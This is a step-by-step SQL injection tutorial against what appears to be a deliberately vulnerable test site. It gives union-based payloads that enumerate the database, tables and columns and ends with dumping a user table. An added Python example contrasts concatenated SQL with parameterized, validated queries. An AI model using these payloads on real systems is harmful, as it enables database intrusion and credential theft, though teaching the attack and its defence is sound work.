Step by Step SQL Injection
Description: SQL Injection is a technique that abuses security holes in the database layer of an application. The hole occurs when input from the user is not filtered correctly. For example, the username field should contain only letters or numbers but is instead filled with other characters (such as -- = '), and the attacker uses that gap to enter SQL queries of their own.
SQL Injection has been the most favored attack technique among hackers from year to year. Network attacks are becoming harder to carry out because targets use increasingly sophisticated defense devices (e.g. firewalls, IDS, UTM), while SQL Injection is still very easy to do because many web programmers are still not "aware" of it.
Target : http://testphp.vulnweb.com/listproducts.php?cat=1
First step: look for a database error by adding -' to the URL.
Next step: find the number of columns by counting up sequentially with an order by query.
The count is not 12, which means the range is 11.
Now we combine the queries using union; the purpose is to bring out the magic numbers that the page displays.
Now you can see the database name using the query database().
The database version using the query version().
The database user using the query user().
Now you can list the table names using the query union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.tables where table_schema=database() --
The column names in the database using the query union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --
Now you can dump the data in the user table.
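Every step above works because the cat value is concatenated into the SQL text. The following is an added example, not code from the original post or from the target site: it uses Python with an in-memory SQLite database, and the table names, column names, sample rows and function names are assumptions. It places the concatenated query beside the same query with allow-list validation and a bound parameter.

```python
import sqlite3

def make_db():
    """In-memory database with constructed sample rows (not the target's data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 1, 'poster'), (2, 1, 'print'), (3, 2, 'frame');
        INSERT INTO users VALUES ('test', 'constructed-secret');
    """)
    return db

def list_products_vulnerable(db, cat):
    # The request value is pasted into the SQL text, so a quote, a comment
    # marker or UNION inside `cat` changes the statement that runs.
    return db.execute("SELECT id, name FROM products WHERE cat = " + cat).fetchall()

def list_products_hardened(db, cat, validate=True):
    # Allow-list check: a category id consists of ASCII digits only.
    if validate and not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be a non-negative integer")
    # Bound parameter: the driver passes the value as data, never as SQL text.
    # validate=False shows that binding alone already neutralises the input.
    return db.execute("SELECT id, name FROM products WHERE cat = ?", (cat,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    union_input = "1 UNION SELECT uname, pass FROM users"  # constructed test input
    print("vulnerable:", list_products_vulnerable(db, union_input))
    print("bound only:", list_products_hardened(db, union_input, validate=False))
    try:
        list_products_hardened(db, union_input)
    except ValueError as exc:
        print("validated :", exc)
```

With the bound parameter the quote probe from the first step no longer produces a database error, and the union input is compared as a plain value that matches no category.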